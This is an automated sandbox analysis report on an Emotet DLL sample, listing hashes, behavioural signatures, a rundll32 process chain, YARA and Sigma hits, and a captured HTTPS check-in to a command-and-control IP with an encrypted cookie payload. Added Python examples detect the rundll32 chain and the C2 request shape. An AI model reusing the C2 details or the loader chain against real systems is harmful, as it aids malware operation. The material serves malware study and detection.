
Windows Analysis Report 3pO1282Kpx

Overview

General Information

Sample Name: 3pO1282Kpx (renamed file extension from none to dll)
Analysis ID: 532438
MD5: 173345845a2a7d0d99c17bdc5445df90
SHA1: 35ed97b5ac5a3ed0fdc00eabff20f3bfcdfc8a7c
SHA256: 9ed58848f0a7b354a32d4ef67ea9ff70ba75f9238c39d9f1af88fae6811cb504
Tags: 32, dll, exe, trojan

Detection

Emotet
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Multi AV Scanner detection for domain / URL
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2616 cmdline: loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2176 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3256 cmdline: rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5592 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4132 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5848 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1184 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1460 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5856 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2500 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 3444 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 4460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5668 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5936 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3772 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1404 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5496 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5352 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5160 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4956 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5020 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4776 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4640 cmdline: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author (the Strings column is empty for every row)
00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(5 of 35 entries shown in this extract)

Unpacked PEs

Source | Rule | Description | Author (the Strings column is empty for every row)
0.0.loaddll32.exe.1523618.10.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0.0.loaddll32.exe.1523618.10.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
2.2.rundll32.exe.520000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
2.2.rundll32.exe.520000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0.0.loaddll32.exe.1523618.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(5 of 75 entries shown in this extract)

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started | Author: FPT.EagleEye | Data:
  Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
  CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\rundll32.exe
  NewProcessName: C:\Windows\SysWOW64\rundll32.exe
  OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
  ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
  ParentImage: C:\Windows\SysWOW64\rundll32.exe
  ParentProcessId: 5848
  ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
  ProcessId: 1184
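The process tree and this Sigma hit describe the same chain: rundll32.exe spawned by rundll32.exe, handed a module from a randomly named sub-directory of SysWOW64 (referred to as System32 by the 32-bit child because of WOW64 file-system redirection) with a non-.dll extension, and invoked through the export name Control_RunDLL, which is a shell32.dll export the sample also exports itself (loaddll32 enumerates it at PID 4132), so the command line resembles a Control Panel launch. The Python below is an added example, not Joe Sandbox code and not a reproduction of the FPT.EagleEye Sigma rule: it scores process-creation events on those four traits. The events are constructed from the command lines in the tree (the image/cmdline/parent_image schema and the cmd.exe image path are assumptions), and one benign shell32.dll,Control_RunDLL launch is added as a control.

```python
import re
from dataclasses import dataclass


# Added example: the field names are an assumed normalisation of a
# process-creation event (Sysmon event 1 or an EDR equivalent).
@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


# Constructed from the process tree in the report (image paths for the first
# event and for cmd.exe are assumed); PID 9999 is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(3256, r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1',
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(5592, r"C:\Windows\SysWOW64\rundll32.exe",
              r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL',
              r"C:\Windows\SysWOW64\rundll32.exe"),
    ProcEvent(5848, r"C:\Windows\SysWOW64\rundll32.exe",
              r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc',
              r"C:\Windows\SysWOW64\rundll32.exe"),
    ProcEvent(1184, r"C:\Windows\SysWOW64\rundll32.exe",
              r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL',
              r"C:\Windows\SysWOW64\rundll32.exe"),
    ProcEvent(9999, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL appwiz.cpl",
              r"C:\Windows\explorer.exe"),
]

# rundll32.exe "<module>",<entry> [args]   or   rundll32.exe <module>,<entry> [args]
RUNDLL_RE = re.compile(
    r'rundll32\.exe\s+(?:"(?P<quoted>[^"]+)"|(?P<bare>[^\s,]+))\s*,\s*(?P<entry>\S+)',
    re.IGNORECASE,
)
# Both prefixes: a 32-bit process naming System32 is redirected to SysWOW64.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Extensions rundll32 is normally handed.
LOADER_EXTS = {".dll", ".cpl", ".ocx", ".ax"}


def parse_rundll32(cmdline):
    """Return (module path, entry point) from a rundll32 command line, or None."""
    m = RUNDLL_RE.search(cmdline)
    if not m:
        return None
    return (m.group("quoted") or m.group("bare"), m.group("entry"))


def tag_event(ev):
    """List the traits of the Emotet rundll32 chain present in one event."""
    tags = []
    if not ev.image.lower().endswith("\\rundll32.exe"):
        return tags
    parsed = parse_rundll32(ev.cmdline)
    if parsed is None:
        return tags
    module, entry = parsed
    mod = module.lower()
    name = mod.rsplit("\\", 1)[-1]
    ext = name[name.rfind("."):] if "." in name else ""
    # 1. Module sits in a sub-directory of System32/SysWOW64. Legitimate targets
    #    live directly in those directories (DriverStore is the usual exception,
    #    which is why a single trait does not reach the threshold).
    if any(mod.startswith(d) and "\\" in mod[len(d):] for d in SYSTEM_DIRS):
        tags.append("module_in_system_subdir")
    # 2. Extension is not one rundll32 is normally handed.
    if ext not in LOADER_EXTS:
        tags.append("non_dll_extension")
    # 3. Control_RunDLL is shell32's export for opening .cpl applets; on any other
    #    module rundll32 resolves it from that module, i.e. the module's own export.
    if entry.lower() == "control_rundll" and name != "shell32.dll" and ext != ".cpl":
        tags.append("control_rundll_on_foreign_module")
    # 4. rundll32 spawned by rundll32: the loader re-launching itself.
    if ev.parent_image.lower().endswith("\\rundll32.exe"):
        tags.append("parent_is_rundll32")
    return tags


def find_suspicious(events, threshold=2):
    """Map pid -> tags for every event carrying at least `threshold` traits."""
    hits = {}
    for ev in events:
        tags = tag_event(ev)
        if len(tags) >= threshold:
            hits[ev.pid] = tags
    return hits


if __name__ == "__main__":
    for pid, tags in find_suspicious(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

Run against the constructed events, PIDs 5592, 5848 and 1184 are flagged (1184 carries all four traits), while the initial export call at PID 3256 and the benign appwiz.cpl launch are not; the threshold of two traits is a starting point to tune against your own rundll32 baseline.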

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 3pO1282Kpx.dll | Virustotal: Detection: 23%
Source: 3pO1282Kpx.dll | ReversingLabs: Detection: 17%
Multi AV Scanner detection for domain / URL
Source: https://45.63.5.129/ | Virustotal: Detection: 7%
Source: 3pO1282Kpx.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown | HTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: 3pO1282Kpx.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wgdi32full.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb | source: WerFault.exe, 00000013.00000003.500168593.00000000048E8000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb | source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb | source: WerFault.exe, 00000013.00000002.513347635.00000000028F2000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( | source: WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EE90927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6EE90927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 25_2_0297E2C8 FindFirstFileW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.63.5.129 187
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected:
  GET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1
  Cookie: gKjP=1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuwewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLpY2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hOoLZlL9MMnyWT3k4lhqZIOv4dj0Q=
  Host: 45.63.5.129
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129 (10 occurrences)
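The captured request has the shape of Emotet's check-in over HTTPS: a bare IP address in Host (consistent with the connections above having no DNS query), no User-Agent, a long random path, and the encrypted request data carried base64-encoded in a Cookie rather than in a POST body. The Python below is an added example, not Joe Sandbox detection logic: it parses a raw HTTP request and scores it on those traits. SAMPLE_REQUEST is rebuilt from the request recorded above (the cookie value is copied verbatim), BENIGN_REQUEST is a constructed control, and the base64 validity check, minimum blob size and entropy threshold are this example's own heuristics.

```python
import base64
import ipaddress
import math
import re
from collections import Counter

# Copied verbatim from the Cookie header captured in the report above.
SAMPLE_COOKIE_BLOB = (
    "1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuw"
    "ewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLp"
    "Y2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hO"
    "oLZlL9MMnyWT3k4lhqZIOv4dj0Q="
)

# Rebuilt from the captured request (header order as recorded).
SAMPLE_REQUEST = (
    "GET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1\r\n"
    f"Cookie: gKjP={SAMPLE_COOKIE_BLOB}\r\n"
    "Host: 45.63.5.129\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed control request with none of the traits.
BENIGN_REQUEST = (
    "GET /api/v1/status?since=2021-11-26 HTTP/1.1\r\n"
    "Host: updates.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Cookie: sessionid=abc123; theme=dark\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers); names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def cookie_values(header_value):
    """Yield the value of every name=value pair in a Cookie header."""
    for pair in header_value.split(";"):
        _, sep, value = pair.strip().partition("=")
        if sep:
            yield value.strip()


def b64_payload(value):
    """Decode standard base64 (missing padding tolerated); None if not base64."""
    if not re.fullmatch(r"[A-Za-z0-9+/]+=*", value):
        return None  # base64url ('-', '_') and JWT-style dotted tokens are rejected
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def shannon_entropy(data):
    """Bits per byte; a few hundred bytes of ciphertext score well above 6."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


RANDOM_PATH = re.compile(r"/[A-Za-z0-9]{16,}")


def indicators(raw, min_blob=32, min_entropy=5.0):
    """Return the Emotet-style traits present in a raw HTTP request."""
    _method, path, headers = parse_request(raw)
    found = []
    host = headers.get("host", "").rsplit(":", 1)[0]  # strip an optional port
    try:
        ipaddress.ip_address(host)
        found.append("host_is_bare_ip")
    except ValueError:
        pass
    if "user-agent" not in headers:
        found.append("no_user_agent")
    if RANDOM_PATH.fullmatch(path):
        found.append("random_path")
    for value in cookie_values(headers.get("cookie", "")):
        blob = b64_payload(value)
        if blob is not None and len(blob) >= min_blob and shannon_entropy(blob) >= min_entropy:
            found.append("base64_cookie_blob")
            break
    return found


def is_emotet_like(raw, threshold=3):
    return len(indicators(raw)) >= threshold


if __name__ == "__main__":
    print(indicators(SAMPLE_REQUEST))
    print(indicators(BENIGN_REQUEST))
```

On the captured request all four traits fire and the cookie decodes to a 200-byte high-entropy blob; the control request scores zero. Because the C2 channel is TLS, these checks only apply where the request is visible, i.e. on a sandbox with interception, a TLS-inspecting proxy, or an endpoint hook.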
Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
